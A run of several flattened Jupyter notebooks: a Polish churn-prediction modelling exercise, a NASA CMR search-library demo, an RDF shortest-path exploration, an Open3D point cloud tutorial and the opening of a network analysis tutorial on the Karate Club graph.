1, 0) test[zmienne] = np.where(test[zmienne] == 'yes', 1, 0) train.head()7.2 Dumifikacja kolumn znakowych - przekształcenie ich do kolumn 0/1to_dummify=['state','area_code'] for i in to_dummify: dummy = pd.get_dummies(train[i], prefix = i) dummy_test = pd.get_dummies(test[i], prefix = i) mask = pd.DataFrame(train[i].value_counts(sort=True)).index[0] dummy.drop(i+'_'+mask, inplace=True, axis=1) dummy_test.drop(i+'_'+mask, inplace=True, axis=1) train = pd.concat([train,dummy], axis=1) test = pd.concat([test, dummy_test], axis=1) train.drop(i, inplace=True, axis=1) test.drop(i, inplace=True, axis=1) train.head() #czy jest jedna mniej zmienna test.head()7.3 Wybór zmiennych, których udział jest większy niż 1,5%bin_col = list() for i in train.columns: if (len(train[i].value_counts()) == 2) & (i != 'churn'): bin_col.append(i) bin_col zdegenerowane = [] for col in bin_col: x = train[col].value_counts() / train[col].value_counts().sum() print(" ") print(col) print(x) if x.iloc[0] <= 0.015 or x.iloc[1] <= 0.015: print(col) print(x) zdegenerowane.append(col) zdegenerowane #wyrzucam zmienne powstałe w wyniku dumifikacji których jednej z kategorii jest mniejszy bądź równy 1,5%. Tak duża dysproporcja mogłaby #sprawić, że ta zmienna nie różnicowałaby zmiennej celu train.drop(zdegenerowane,axis=1,inplace=True) test.drop(zdegenerowane,axis=1,inplace=True)7.4 Badanie korelacji ze zmienną celubazaCorr=train.corr() np.abs(bazaCorr['churn']).sort_values(ascending=False)[0:30] #zadna zmienna nie jest silnie skorelowana z zmienna celu, wiec zadnej nie usuwam (zadna nie jest podejrzana)7.5 Badanie korelacji pomiędzy zmiennymi objaśniającymitarget = 'churn' skorelowane = [] for i in train.columns: for j in train.columns: if i != j and np.abs(bazaCorr[i][j]) >= 0.7: if i not in skorelowane and j not in skorelowane: if abs(bazaCorr[i][target]) < abs(bazaCorr[target][j]): skorelowane.append(i) else: skorelowane.append(j) skorelowane #Sprawdzam korelacje między zmiennymi objaśniającymi - jeżeli między nimi występuje zależność r > 0.7 to sprawdzam, która ze zmiennych #jest bardziej skorelowana ze zmienną celu - zostawiam tą z większym współczynnkiem korelacji pearsona train.drop(skorelowane,axis=1,inplace=True) test.drop(skorelowane,axis=1,inplace=True) #usuwam te zmienne7.6 Identyfikacja zmiennych nie różnicujących zmiennej celubin_col = list() for i in train.columns: if (len(train[i].value_counts()) == 2) & (i != 'churn'): bin_col.append(i) notdiff =[] for i in bin_col: table=train[[i, target]].groupby([i], as_index=False).mean().sort_values(by=target, ascending=False) print('--------------------------------------') print(i) print(table) print(' ') diff = 100* (table.loc[0,target] - table.loc[1, target]) / table.loc[0,target] print('Różnica: ', diff) if abs(diff) <= 10: notdiff.append(table.columns[0]) #Jeżeli różnica między udziałem zdarzeń w obu kategoriach jest mniejsza niż 10%, to je usuwam - zakładam, że zmienne o mniejszej #różnicy nie są istotnie różnicujące notdiff train.drop(notdiff,axis=1,inplace=True) test.drop(notdiff,axis=1,inplace=True) #usuwam len(train.columns)8. Wybór zmiennych do modelu 8.1 Podział zbioru X_train, X_test, y_train, y_testX_train = train.drop('churn',axis=1) X_test = test.drop('churn',axis=1) y_train = train['churn'] y_test = test['churn'] model = ExtraTreesClassifier(n_estimators=12) model.fit(X_train, y_train) print(model.feature_importances_) features_tree_ = pd.DataFrame(model.feature_importances_, index=X_train.columns,columns=['values']).sort_values('values',ascending=False)[0:20] features_tree_ features_tree_.plot(kind='bar',color='darkviolet',figsize=(12,8)) plt.title('Najważniejsze zmienne') plt.xticks(rotation=70) important_features = features_tree_[0:12].index9. Budowa modelu 9.1 Undersamplingfrom imblearn.under_sampling import ClusterCentroids cc = ClusterCentroids(random_state=0) X_resampled, y_resampled = cc.fit_resample(X_train, y_train) X_resampled_pd = pd.DataFrame(X_resampled, columns=X_train.columns) y_resampled_pd = pd.DataFrame(y_resampled) y_train.value_counts() y_resampled.value_counts() def evaluateModel(alg, X_train, Y_train, X_test, Y_test, treshold): #Fit the algorithm on the data alg.fit(X_train, Y_train) #Predict test set: X_test_predictions = alg.predict(X_test) X_test_predprob0 = alg.predict_proba(X_test) X_test_predprob = alg.predict_proba(X_test)[:,1] for i in range(len(X_test_predprob)): if X_test_predprob[i] >= treshold: X_test_predprob[i] = 1 else: X_test_predprob[i] = 0 print("AUC Score: " + str(roc_auc_score(Y_test, X_test_predprob0[:,1]))) print("Accuracy Test: " + str(accuracy_score(Y_test, X_test_predictions))) print("Precision: " + str(precision_score(Y_test, X_test_predprob))) print("Recall: " + str(recall_score(Y_test, X_test_predprob))) confMatrix=confusion_matrix(Y_test, X_test_predprob) confMatrix=pd.DataFrame(confMatrix) confMatrix.columns=[['Predicted 0','Predicted 1']] confMatrix.index=[['True 0','True 1']] print('') print('Confusion Matrix:') print('') print(confMatrix) print('Accuracy Matrix:') Accuracy_Matrix=100*confMatrix.div(confMatrix.sum(axis=1),axis=0) print(Accuracy_Matrix) print('') return X_test_predprob09.2 Model regresji logistycznej 9.21 Ewaluacja modelu przed undersamplingiemX_test[important_features] log_reg = LogisticRegression(max_iter=200) print('TRAIN set') evaluateModel(log_reg, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('') print('TEST set') preds_lr = evaluateModel(log_reg, X_train[important_features], y_train, X_test[important_features], y_test, 0.5)TRAIN set AUC Score: 0.7908183655099519 Accuracy Test: 0.8682352941176471 Precision: 0.6097560975609756 Recall: 0.17899761336515513 Confusion Matrix: Predicted 0 Predicted 1 True 0 2508 48 True 1 344 75 Accuracy Matrix: Predicted 0 Predicted 1 True 0 98.122066 1.877934 True 1 82.100239 17.899761 TEST set AUC Score: 0.7841312237491335 Accuracy Test: 0.8611764705882353 Precision: 0.5166666666666667 Recall: 0.17318435754189945 Confusion Matrix: Predicted 0 Predicted 1 True 0 1067 29 True 1 148 31 Accuracy Matrix: Predicted 0 Predicted 1 True 0 97.354015 2.645985 True 1 82.681564 17.3184369.22 Ewaluacja modelu po undersamplingulog_reg = LogisticRegression(max_iter=200) print('TRAIN set') evaluateModel(log_reg, X_resampled_pd[important_features], y_resampled_pd , X_resampled_pd[important_features], y_resampled_pd, 0.9) print('') print('TEST set') preds_lr_samp = evaluateModel(log_reg, X_resampled_pd[important_features], y_resampled_pd, X_test[important_features], y_test, 0.9)TRAIN set AUC Score: 0.8762595337233212 Accuracy Test: 0.8186157517899761 Precision: 0.98125 Recall: 0.3747016706443914 Confusion Matrix: Predicted 0 Predicted 1 True 0 416 3 True 1 262 157 Accuracy Matrix: Predicted 0 Predicted 1 True 0 99.284010 0.715990 True 1 62.529833 37.470167 TEST set AUC Score: 0.7852933980344982 Accuracy Test: 0.6329411764705882 Precision: 0.4022346368715084 Recall: 0.4022346368715084 Confusion Matrix: Predicted 0 Predicted 1 True 0 989 107 True 1 107 72 Accuracy Matrix: Predicted 0 Predicted 1 True 0 90.237226 9.762774 True 1 59.776536 40.2234649.23 Porownanie modelu regresji logistycznej przed undersamplingiem i pofpr1, tpr1, thresholds1 = roc_curve(y_test, preds_lr[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_lr_samp[:,1]) plt.figure(figsize=(15,10)) plt.title("Logistic Regression ROC Curve") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='without sampling', color='hotpink') plt.plot(fpr2, tpr2, label='undersampling', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #pomimo ze krzywe ROC sa podobne a miary AUC sa podobne, to jednak precyzja dla modelu bez undersamplingu dla roznych punktow #odciecia jest lepsza niz dla modelu po undersamplingu (model z undersamplingiem duzo klasyfikuje jako FP), dlatego decyduje sie #na odrzucenie modelu z undersamplingiem9.24 Optymalizacja modelu regresji logistycznejmodel = LogisticRegression(max_iter=1000) solvers = [ 'lbfgs', 'liblinear'] penalty = ['l1', 'l2'] c_values = [100, 10, 1.0, 0.1, 0.01] grid = dict(solver=solvers,penalty=penalty,C=c_values) cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1) grid_search = GridSearchCV(estimator=model, param_grid=grid, n_jobs=-1, cv=cv, scoring='accuracy',error_score=0) grid_result = grid_search.fit(X_train[important_features], y_train) print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_)) #Zoptymalizowane parametry regresji logistycznej log_reg = LogisticRegression(max_iter=1000,C=0.1,penalty='l2',solver='lbfgs') print('TRAIN set') evaluateModel(log_reg, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('') print('TEST set') preds_lr_opt = evaluateModel(log_reg, X_train[important_features], y_train, X_test[important_features], y_test, 0.5) fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_lr[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_lr_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Logistic Regression ROC Curve") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='not optimized', color='hotpink') plt.plot(fpr2, tpr2, label='optimized', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #Po optymalizacji parametrów regresji logistycznej obszar pod krzywa ROC jest znaczaco wiekszy9.3 Model random forestrf = RandomForestClassifier() print('TRAIN set') evaluateModel(rf, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_rf = evaluateModel(rf, X_train[important_features], y_train, X_test[important_features], y_test, 0.5) #na regresji z undersamplingiem bylo gorzej, wiec tutaj juz nie sprawdzam dla danych undersamplingowych param_grid1 = { 'max_depth': np.arange(3,20,1), 'max_features': ["auto", "sqrt", "log2"] } rf = RandomForestClassifier() grid_search = GridSearchCV(estimator = rf, param_grid = param_grid1, cv = 3, n_jobs = -1, verbose = 2) grid_search.fit(X_train[important_features],y_train) grid_search.best_params_, grid_search.best_score_ param_grid2 = { 'min_samples_leaf': [3, 4, 5, 10], 'min_samples_split': [3, 8, 10, 12] } rf = RandomForestClassifier(max_depth=19, max_features='log2') grid_search2 = GridSearchCV(estimator = rf, param_grid = param_grid2) grid_search2.fit(X_train[important_features],y_train) grid_search2.best_params_, grid_search2.best_score_ param_grid3= { 'n_estimators': [100, 200, 300, 1000] } rf = RandomForestClassifier(max_depth=19, max_features='log2', min_samples_leaf=3, min_samples_split=8) grid_search3 = GridSearchCV(estimator = rf, param_grid = param_grid3, cv=5) grid_search3.fit(X_train[important_features],y_train) grid_search3.best_params_, grid_search3.best_score_ rf = RandomForestClassifier(max_depth=19, max_features='log2', min_samples_leaf=3, min_samples_split=8,n_estimators=200) print('TRAIN set') evaluateModel(rf, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_rf_opt = evaluateModel(rf, X_train[important_features], y_train, X_test[important_features], y_test, 0.5) fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_rf[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_rf_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Random forest model before and after tuning") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='Random forest before tuning', color='hotpink') plt.plot(fpr2, tpr2, label='Random forest after tuning', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #optymalizacja niezbyt wplynela, oba sa bardzo podobne fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_rf[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_lr_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Random forest vs Regresja Logistyczna") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='Random forest', color='hotpink') plt.plot(fpr2, tpr2, label='Regresja logistyczna', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #Po powyzszym wykresie widac, ze las losowy jest zdecydowanie lepszy od modelu regresji logistycznej9.4 Model XGBoostxg_boost_1 = XGBClassifier(objective= 'binary:logistic') print('TRAIN set') evaluateModel(xg_boost_1, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_xgb = evaluateModel(xg_boost_1, X_train[important_features], y_train, X_test[important_features], y_test, 0.3) param_test1 = { 'max_depth': np.arange(3,20,1), 'min_child_weight': np.arange(1,6,1), } gsearch1 = GridSearchCV(estimator = XGBClassifier(objective= 'binary:logistic'), param_grid = param_test1, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch1.fit(X_train[important_features],y_train) gsearch1.best_params_, gsearch1.best_score_ param_test2 = { 'gamma': [i/10.0 for i in range(0,5)] } gsearch2 = GridSearchCV(estimator = XGBClassifier( max_depth=3, min_child_weight=2, objective= 'binary:logistic'), param_grid = param_test2, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch2.fit(X_train[important_features],y_train) gsearch2.best_params_, gsearch2.best_score_ param_test3= { 'subsample':[i/10.0 for i in range(6,10)], 'colsample_bytree':[i/10.0 for i in range(6,10)] } gsearch3 = GridSearchCV(estimator = XGBClassifier( max_depth=3, min_child_weight=2, gamma=0, objective= 'binary:logistic'), param_grid = param_test3, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch3.fit(X_train[important_features],y_train) gsearch3.best_params_, gsearch3.best_score_ param_test4= { 'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100] } gsearch4 = GridSearchCV(estimator = XGBClassifier( max_depth=3, min_child_weight=2, gamma=0, colsample_bytree = 0.6, subsample= 0.9, objective= 'binary:logistic'), param_grid = param_test4, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch4.fit(X_train[important_features],y_train) gsearch4.best_params_, gsearch4.best_score_ xg_boost_1 = XGBClassifier(max_depth=3, min_child_weight=2, gamma=0, colsample_bytree = 0.6, subsample= 0.9, objective= 'binary:logistic',reg_alpha=1) print('TRAIN set') evaluateModel(xg_boost_1, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_xgb_opt = evaluateModel(xg_boost_1, X_train[important_features], y_train, X_test[important_features], y_test, 0.3) fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_xgb[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_xgb_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Model XGBoost przed i po optymalizacji") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='XGBoost przed optymalizacja', color='hotpink') plt.plot(fpr2, tpr2, label='XGBoost po optymalizacji', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_rf[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_xgb_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Random forest vs XGBoost po optymalizacji") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='Random forest', color='hotpink') plt.plot(fpr2, tpr2, label='XGBoost po optymalizacji', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #AUC takie samo w modelu XGBoost i Random Forest, recall lepszy w XGBoost ale w Random Forest lepsza jest precyzja #Modele są bardzo podobne i błędem nie będzie wzięcie jednego lub drugiego #Gdyby to były rzeczywiste dane, to tak idealny wynik powinien budzić podejrzenia. Raczej nie jest on możliwy do uzyskania na rzeczywistych #danych, jeżeli nie dołączymy przypadkiem nieporządanej zmiennej #Podsumowując, w naszym zbiorze danych nie było braków danych. Na początku została przeprowadzona analiza opisowa danych, która #pozwoliła na wyciągnięcie podstawowych wniosków dotyczących zbioru danych. Później ze zbioru zostały wykluczone pewne zmienne, #które nie wpływały istotnie na zmienną celu. Na końcu została przeprowadzona analiza pod kątem wyboru odpowiedniego modelu #predykcyjnego. Najlepszym modelem Random Forest lub XGBoost.Python Wrapper for CMR`A python library to interface with CMR - Collection Search Demo`This demo will show how to preform a **collection** search against CMR while inside a notebook. Loading the libraryFrom the command line, make sure you call `runme.sh -p -i` to both backage and install the library through pip3.n Load modulesimport cmr.search.collection as collGet Online HelpAt least some understanding of the CMR API will be needed from time to time, to assist with that the following call can be used to open a browser window to the API. For the fun of it, you can pass in an HTML anchor tag on the page and jump directly there.coll.open_api()Searching Perform A Basic SearchesSearch for all records that contain the word 'salt'.results = coll.search({'keyword':'salt'}) print("Found {} records.".format(len(results))) for i in results: print (i)A Search with a columns filtered from resultReduce the result columns by only showing the collection curration fields and drop the entry title.This search also searches UATparams = {} #params['provider'] = 'SEDAC' # 276 records #params['keyword'] = 'fish food' # 131 records params['keyword'] = 'salt' # 290 records config={'env':'uat'} # 290 in prod, 49 in UAT as of 2020-12-01 results = coll.search(params, filters=[coll.collection_core_fields, coll.drop_fields('EntryTitle')], limit=1000, config=config) print("Found {} records.".format(len(results))) for i in results: print (i)Find a lot of collection recordsThis should find just over a full page (2000) of results.params = {} results = coll.search(params, filters=[coll.collection_core_fields, coll.drop_fields('EntryTitle')], limit=2048, config={'env':'uat'}) print("Found {} records.".format(len(results))) for i in results: print (i)Applying Filters after a searchInternally the code calls apply_filters() but it can be called manually as show below. One reason to do this is to download the data once and then apply filters as needed.params = {} raw_results = coll.search(params, limit=2, config={'env':'uat'}) clean_results = coll.apply_filters([coll.collection_core_fields,coll.drop_fields('EntryTitle')], raw_results) print("Found {} records.".format(len(clean_results))) for i in clean_results: print (i)Sortingdef sorted_search(params): results = coll.search(params, filters=[coll.collection_core_fields], limit=11) print("Found {} records.".format(len(results))) for i in results: print (i) #params = {'keyword':'modis', 'sort_key': 'instrument'} sorted_search({'keyword':'modis', 'sort_key': 'instrument'}) print('\nvs\n') sorted_search({'keyword':'modis', 'sort_key': '-instrument'})Help with Sort KeysCan not remember the sort keys, look them upcoll.open_api("#sorting-collection-results")Getting Helpprint out all the docstrings, you can filter by a prefix if you wantprint(coll.print_help())Filtered Shortest PathFinding all the shortest paths between two nodes, using a filtered set of properties.*outstanding questions:*- can we order/filter these paths by 'uniqueness'? (e.g. connecting people because they are humans isn't that interesting!)!pip install networkx # Imports from rdflib import Graph from rdflib.extras.external_graph_libs import rdflib_to_networkx_graph import networkx as nx from networkx import Graph as NXGraph from networkx.algorithms.traversal.beamsearch import bfs_beam_edges from networkx.algorithms.shortest_paths.generic import all_shortest_paths from itertools import islice import matplotlib.pyplot as plt import statistics import collections import numpy as np from rdflib import URIRef, Literal import requests import json url = "https://d0rgkq.deta.dev/labels" def get_labels(entities): payload = json.dumps({ "uris": entities }) headers = { 'Content-Type': 'application/json' } return requests.post(url, headers=headers, data=payload).json() # RDF graph loading # This takes a while (10+ minutes). If you're working on a local machine it'll # be better to download the file from `path` below and give this notebook a # local path. path = "https://heritageconnector.s3.eu-west-2.amazonaws.com/rdf/hc_dump_latest.nt" rg = Graph() rg.parse(path, format='nt') print("rdflib Graph loaded successfully with {} triples".format(len(rg))) # Optionally get a subgraph # Here we filter out all the triples with skos:hasTopConcept # one of ({OBJECT, PERSON or ORGANISATION}) and sdo:isPartOf (describes collection # membership for objects) properties = [ "hc:entityPERSON", "hc:entityORG", "hc:entityNORP", "hc:entityFAC", "hc:entityLOC", "hc:entityOBJECT", "hc:entityLANGUAGE", "hc:entityDATE", "sdo:birthDate", "sdo:deathDate", "sdo:foundingDate", "sdo:dissolutionDate", "foaf:maker", "foaf:made", "sdo:mentions", "owl:sameAs", "skos:related", "skos:relatedMatch", # "wdt:P101", # field of work "wdt:P1056", # "wdt:P106", # occupation "wdt:P127", "wdt:P135", "wdt:P136", "wdt:P137", "wdt:P1535", # "wdt:P17", # country "wdt:P176", "wdt:P18", "wdt:P180", "wdt:P20", # "wdt:P21", # sex or gender "wdt:P27", "wdt:P279", "wdt:P287", "wdt:P31", "wdt:P3342", "wdt:P452", # "wdt:P495", # country of origin "wdt:P607", "wdt:P61", "wdt:P710", "wdt:P749", "wdt:P793", "sdo:birthPlace", "sdo:deathPlace", ] query = f""" PREFIX owl: PREFIX skos: PREFIX sdo: PREFIX foaf: PREFIX xsd: PREFIX rdf: PREFIX rdfs: PREFIX smgp: PREFIX smgo: PREFIX smgd: PREFIX wd: PREFIX wdt: PREFIX hc: CONSTRUCT {{ ?s ?p ?o }} WHERE {{ ?s ?p ?o. FILTER (?p in ({", ".join(properties)})). }} """ print(query) subg = rg.query(query) # Conversion of rdflib.Graph to networkx.Graph if 'subg' in locals(): print("Using subgraph generated in last cell") G = rdflib_to_networkx_graph(subg) else: print("Using entire rdf graph") G = rdflib_to_networkx_graph(rg) print("networkx Graph loaded successfully with length {}".format(len(G)))Using subgraph generated in last cellShortest path# Joy Division to ent_a, ent_b = URIRef("http://www.wikidata.org/entity/Q172763"), URIRef("https://collection.sciencemuseumgroup.org.uk/people/cp127589") # to 'Vampire' aircraft # ent_a, ent_b = URIRef("http://www.wikidata.org/entity/Q56008"), URIRef("https://collection.sciencemuseumgroup.org.uk/objects/co8223281") all_sps = all_shortest_paths(G, ent_a, ent_b) path_graphs = [nx.path_graph(sp) for sp in all_sps] for idx, p in enumerate(path_graphs): print(f"Path {idx+1}") for idx, ea in enumerate(p.edges()): subj = ea[0] edges = [i[1] for i in G.edges[ea[0], ea[1]]['triples']] obj = ea[1] ent_labels = get_labels([e for e in ea if e.startswith("http")]) if idx +1 < len(p.edges()): print(f"- {ent_labels.get(str(subj)) or subj} -> {edges[0]}") else: print(f"- {ent_labels.get(str(subj)) or subj} -> {edges[0]}") print(f"- {ent_labels.get(str(obj)) or obj}")Path 1 - Joy Division -> http://www.wikidata.org/prop/direct/P31 - http://www.wikidata.org/entity/Q215380 -> http://www.wikidata.org/prop/direct/P31 - Kraftwerk -> http://www.heritageconnector.org/RDF/entityORG - Kraftwerk Uncovered -> http://www.heritageconnector.org/RDF/entityPERSON - Path 2 - Joy Division -> http://www.wikidata.org/prop/direct/P31 - http://www.wikidata.org/entity/Q215380 -> http://www.wikidata.org/prop/direct/P31 - Icebreaker -> http://www.heritageconnector.org/RDF/entityORG - Kraftwerk Uncovered -> http://www.heritageconnector.org/RDF/entityPERSON - Path 3 - Joy Division -> http://www.wikidata.org/prop/direct/P31 - http://www.wikidata.org/entity/Q215380 -> http://www.wikidata.org/prop/direct/P31 - Boomkat -> http://www.heritageconnector.org/RDF/entityORG - Oramics To Electronica Phase Two -> http://www.heritageconnector.org/RDF/entityPERSON - Path 4 - Joy Division -> http://www.wikidata.org/prop/direct/P136 - http://www.wikidata.[...]Point CloudThis tutorial demonstrates basic usage of a point cloud. Visualize point cloudThe first part of the tutorial reads a point cloud and visualizes it.print("Load a ply point cloud, print it, and render it") pcd = o3d.io.read_point_cloud("../../TestData/fragment.ply") print(pcd) print(np.asarray(pcd.points)) o3d.visualization.draw_geometries([pcd])`read_point_cloud` reads a point cloud from a file. It tries to decode the file based on the extension name. The supported extension names are: `pcd`, `ply`, `xyz`, `xyzrgb`, `xyzn`, `pts`.`draw_geometries` visualizes the point cloud. Use mouse/trackpad to see the geometry from different view point.It looks like a dense surface, but it is actually a point cloud rendered as surfels. The GUI supports various keyboard functions. One of them, the - key reduces the size of the points (surfels).**Note:** Press `h` key to print out a complete list of keyboard instructions for the GUI. For more information of the visualization GUI, refer to Visualization and Customized visualization. TODO links**Note:** On OS X, the GUI window may not receive keyboard event. In this case, try to launch Python with `pythonw` instead of `python`. Voxel downsamplingVoxel downsampling uses a regular voxel grid to create a uniformly downsampled point cloud from an input point cloud. It is often used as a pre-processing step for many point cloud processing tasks. The algorithm operates in two steps:1. Points are bucketed into voxels.2. Each occupied voxel generates exact one point by averaging all points inside.print("Downsample the point cloud with a voxel of 0.05") downpcd = pcd.voxel_down_sample(voxel_size=0.05) o3d.visualization.draw_geometries([downpcd])Vertex normal estimationAnother basic operation for point cloud is point normal estimation.Press n to see point normal. Key - and key + can be used to control the length of the normal.print("Recompute the normal of the downsampled point cloud") downpcd.estimate_normals(search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30)) o3d.visualization.draw_geometries([downpcd], point_show_normal=True)`estimate_normals` computes normal for every point. The function finds adjacent points and calculate the principal axis of the adjacent points using covariance analysis.The function takes an instance of `KDTreeSearchParamHybrid` class as an argument. The two key arguments `radius = 0.1` and `max_nn = 30` specifies search radius and maximum nearest neighbor. It has 10cm of search radius, and only considers up to 30 neighbors to save computation time.**Note:** The covariance analysis algorithm produces two opposite directions as normal candidates. Without knowing the global structure of the geometry, both can be correct. This is known as the normal orientation problem. Open3D tries to orient the normal to align with the original normal if it exists. Otherwise, Open3D does a random guess. Further orientation functions such as `orient_normals_to_align_with_direction` and `orient_normals_towards_camera_location` need to be called if the orientation is a concern. Access estimated vertex normalEstimated normal vectors can be retrieved by `normals` variable of `downpcd`.print("Print a normal vector of the 0th point") print(downpcd.normals[0])To check out other variables, please use `help(downpcd)`. Normal vectors can be transformed as a numpy array using `np.asarray`.print("Print the normal vectors of the first 10 points") print(np.asarray(downpcd.normals)[:10, :])Check Working with NumPy for more examples regarding numpy array. TODO link Crop point cloudprint("Load a polygon volume and use it to crop the original point cloud") vol = o3d.visualization.read_selection_polygon_volume("../../TestData/Crop/cropped.json") chair = vol.crop_point_cloud(pcd) o3d.visualization.draw_geometries([chair])`read_selection_polygon_volume` reads a json file that specifies polygon selection area. `vol.crop_point_cloud(pcd)` filters out points. Only the chair remains. Paint point cloudprint("Paint chair") chair.paint_uniform_color([1, 0.706, 0]) o3d.visualization.draw_geometries([chair])An Introduction to Network Analysis in Python**Author: ****Date: Jan 10, 2021** Networks are everywhere [N]etworks will dominate the new centruy to a much greater degree than most people are yet ready to acknowledge. (Barabasi, 2014, p.7) Networks are an integral part of our daily lives. Connections on Facebook, Twitter, or LinkedIn are networks of contacts and followers. Roads, railroads, metros, and flight routes form transportation networks. Goods and services are the result of buyer and supplier networks. Power and water are provided via complex networks of lines and pipes. Every day, we use these networks, often without thinking of them as “networks”—we ask friends for favors, travel to work, consume goods, and open the tap. Network analysis is the systematic study of the structures of these networks. It provides tools to answer questions such as: Which friend should I contact if I am looking for a job? What is the shortest way to get from Las Vegas to Rome? How can we prevent grid overload? This tutorial provides an introduction to network analysis in Python. It discusses key network concepts and their application in Python. The tutorial is aimed at beginners and deliberately limits use of mathematical formulas. The next section provides an introduction to the logic of network analysis. The following sections walk through an exemplary analysis. From Networks to Network Analysis Describing networks Networks are represented as sets of **nodes** or vertices (N) connected through sets of **edges** or ties (E), short G = (N, E). Nodes can be, for example, people, corporations, countries, airports, phones, and email addresses. Edges are the links between these nodes such as friendship between people, business transactions between corporations, migration between countries, flights between airports, and so on. Figure 1 shows a simple network of four people (nodes) connected by four links (edges). Edges from a node to itself such as when a person sends an email to herself are called **self-links**. While possible, these links are often excluded from analysis. Figure 1. Network of four people (nodes) connected by four links (edges). Edges can be directed or undirected and weighted or unweighted. **Directed** edges refer to relations that involve a directionality such as person A calling person B or a flight connection from city X to city Y. **Undirected** edges refer to relations without directionality such as having dinner together or collaborating on a project. **Weighted** edges are relations that can be quantified such as number of emails sent or amount of money given. **Unweighted** edges are relations that are not quantified such as being a friend or a co-worker. Figure 2 shows the four different types of networks resulting from combinaions of these edge characteristics. Undirected, unweighted networks are the easiest to analyze. Therefore, if justifiable, other types of networks are often transformed to this type for analysis. Figure 2. Four different types of networks according to edge characteristics. Finally, on the network level, we differentiate unipartite vs. bipartite networks (see Figure 3 for a schematic overview). **Unipartite networks** are composed of one type of nodes and every node can, in principle, be connected to every other node. An example is a friendship network of people. In contrast, **bipartite networks** (also called two-mode data) are composed of two types of nodes with links only *between* but *not among* types. An example is attendance of parties by people. Here, nodes are parties and people with links only between people and parties (but not among parties or among people). Bipartite networks can be transformed into unipartite networks. For example, we can link people based on co-attendance of parties. Figure 3 provides a schematic representation of unipartite and bipartite networks. Figure 3. Unipartite vs. bipartite networks. Network Data Network data is commonly stored using edge lists or adjacency matrices (see Figure 4 for a schematic). **Edge lists** are sets of rows with every row representing an edge in the network. For directed networks, the first entry indicates the start and the second entry the end of an edge. An additional column may be added to indicate the strength (weight) of the edge. **Adjacency matrices** are matrices with nodes in the columns and rows. The entries in the matrix indicate presence (1) or absence (0) or strength (weight) of an edge. For directed networks, rows usually represent start and columns end of edges. The diagonal in an adjacency matrix shows self-links. Figure 4. Edgelist and adjacency matrix for network of four people. Analyzing Networks Now that we are familiar with the logic of network data, we will apply our new tool to analyze a real-world network of social contacts. The following sections walk through an exemplary analysis of the Karate Club network. The Karate Club network shows the social connections between members of a university karate club. Two members are linked in the network if they regularly interact *outside* of the karate club. The network data was collected by Zachary (1977) and is based on observations from 1970 to 1972. The data is included in the NetworkX library. Prepare the Network We start by loading the libraries and the network.# Import libraries import networkx as nx # for network analysis import pandas as pd # for easy data handling import numpy as np # for calculations from scipy.cluster import hierarchy # for dendrogram visualization import matplotlib.pyplot as plt # for graphs import seaborn as sns # for graphs # Load karate club data karate_club_net = nx.karate_club_graph()Next, we inspect the network.# Is the network directed? Weighted? print("Is the network directed?", nx.is_directed(karate_club_net)) print("Is the network weighted?", nx.is_weighted(karate_club_net)) # How many nodes and edges are in the network? print("Number of nodes: ", nx.number_of_nodes(karate_club_net)) print("Number of edges: ", nx.number_of_edges(karate_club_net)) print("Number of self-links: ", nx.number_of_selfloops(karate_club_net))Is the network directed? False Is the network weighted? False Number of nodes: 34 Number of edges: 78 Number of self-links: 0The network is undirected and unweighted. It consists of 34 nodes (club members) and 78 edges (social connections) with no self-links. Visualize the Network A network graph provides a first overview of a network and can help spot key characteristics visually. Here, we use NetworkX visualization tools (for other tools see nxviz and this Visualization Tutorial).# Visualize the network pos = nx.spring_layout(karate_club_net) # Define a layout. Other handy layouts: 